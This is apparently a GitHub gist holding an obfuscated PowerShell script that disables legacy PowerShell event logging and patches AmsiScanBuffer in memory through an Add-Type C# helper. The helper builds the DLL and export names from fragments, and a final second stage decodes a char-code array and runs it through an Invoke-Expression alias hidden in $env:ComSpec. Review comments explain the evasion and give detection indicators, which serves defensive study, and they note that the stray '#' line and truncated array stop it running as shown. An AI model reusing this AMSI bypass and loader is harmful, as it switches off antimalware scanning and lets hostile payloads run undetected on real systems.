@jdferrell3
Created June 3, 2020 05:42
# Anti-logging: turns off the legacy Windows PowerShell engine/provider
# lifecycle and health events for this session before anything else runs.
# NOTE(review): these preference variables govern only the classic
# "Windows PowerShell" event log entries; they should not affect script block
# logging or module logging, so the script body remains visible to those
# channels where they are enabled.
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
# Compiles an in-memory C# helper and immediately runs it to neutralise AMSI
# scanning in the current process. Everything below is named randomly; the
# only stable indicators are the P/Invoke EntryPoint strings, the 0x40
# protection constant and the patch bytes.
Function jpnm {
# Set-Alias: hides the literal cmdlet name 'Add-Type' behind a random alias.
sal bifsynume Add-Type ;
# Add-Type -Language value differs between PowerShell v2 and v3+.
if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'}
# Runtime compilation of the C# source in the here-string (Add-Type via alias).
bifsynume @"
using System;
using System.Runtime.InteropServices;
// P/Invoke wrappers with randomised method names; the real Win32 API names
// survive only in the EntryPoint attribute strings, which is where static
// detection should look.
public class tqjn
{
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
static extern IntPtr atrzq(IntPtr hModule, string procName);
[DllImport("kernel32", EntryPoint = "LoadLibrary")]
static extern IntPtr hesadw(string name);
[DllImport("kernel32", EntryPoint = "VirtualProtect")]
static extern bool yarsmcv(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
// NOTE(review): the following line begins with '#', which is not a C#
// comment; it reads as a poster annotation and will not compile as C#
// if fed to Add-Type verbatim.
# AMSI bypass
// Patch stubs written over the start of the resolved export. Both encode
// "mov eax, 0x80070057" (E_INVALIDARG) followed by a return: the 6-byte form
// ends in a plain ret (64-bit), the 8-byte form in "ret 0x18" (32-bit
// stdcall stack clean-up). Any later scan request therefore returns an
// invalid-argument HRESULT without scanning.
static byte[] dae67 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] zsc56 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
// Entry point invoked from PowerShell; selects the stub by process bitness.
public static void vxbiwrol()
{
if (khbfyc45())
Patchtqjn(dae67);
else
Patchtqjn(zsc56);
}
// patches AMSI
// Resolves amsi.dll / AmsiScanBuffer and overwrites its first bytes with the
// supplied stub. Module and export names are assembled from fragments so
// the literals "amsi.dll" and "AmsiScanBuffer" never appear in the source.
// Detection keyed on those literals will miss this; detection keyed on the
// call sequence LoadLibrary -> GetProcAddress -> VirtualProtect(0x40) ->
// Marshal.Copy inside an Add-Type'd assembly will not.
private static void Patchtqjn(byte[] qpdkm45)
{
try
{
// fragments of "amsi.dll"
var one = "i.d";
var fto4 = "a";
var boo = "ll";
var kxcx4 = "ms";
var djrhbt4 = hesadw(fto4 + kxcx4 + one + boo);
if (djrhbt4 == IntPtr.Zero)
{
// module could not be loaded: fail silently, script continues
return;
}
// fragments of "AmsiScanBuffer"
var urgmq3 = "nBuf";
var ltxpdot4 = "Am";
var yua29 = "s";
var odv35 = "fer";
var ish46 = "iSca";
var peqr49 = atrzq(djrhbt4, ltxpdot4 + yua29 + ish46 + urgmq3 + odv35);
if (peqr49 == IntPtr.Zero)
{
return;
}
uint oldProtect;
// 0x40 = PAGE_EXECUTE_READWRITE. The return value is ignored and the
// original protection is never restored, so the patched page stays RWX:
// a useful memory-scan artefact for defenders.
yarsmcv(peqr49, (UIntPtr)qpdkm45.Length, 0x40, out oldProtect);
Marshal.Copy(qpdkm45, 0, peqr49, qpdkm45.Length);
}
catch (Exception e)
{
// Failures are printed to the console and swallowed; the caller is never
// told whether the patch succeeded.
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
// True in a 64-bit process (pointer size other than 4 bytes).
private static bool khbfyc45()
{
bool khbfyc45 = true;
if (IntPtr.Size == 4)
khbfyc45 = false;
return khbfyc45;
}
}
"@ -Language $e
# Applies the patch as a side effect of definition. The method is void, so
# $ptr is always $null; the assignment only suppresses output.
$ptr = [tqjn]::vxbiwrol()
}
# Gate on CLR 4 (Windows PowerShell 3+). NOTE(review): CLRVersion is not
# populated on PowerShell Core, so there the comparison presumably fails and
# the AMSI patch is skipped entirely.
if ($PSVersionTable.CLRVersion.Major -gt 3) {jpnm}
# second payload, shortened for space
# Second stage: an integer array is turned back into characters ([Int] -as
# [ChaR]) and joined into a string, which is then dot-sourced through a
# cmdlet whose name is built from characters 4, 26 and 25 of $env:ComSpec.
# With the default 'C:\WINDOWS\system32\cmd.exe' those spell 'Iex', i.e.
# Invoke-Expression. The mixed-case tokens and the indirect cmdlet name are
# keyword-matching evasion. The array is truncated ('...') on this page, so
# the decoded stage is not recoverable from here and this line will not
# parse as-is.
(( 48 ,46 , 46 , ... ,125 ) |fOrEAch-OBJeCt{( [Int] $_-AS[ChaR])} ) -Join''| . ( $eNv:cOmspEc[4,26,25]-jOin'')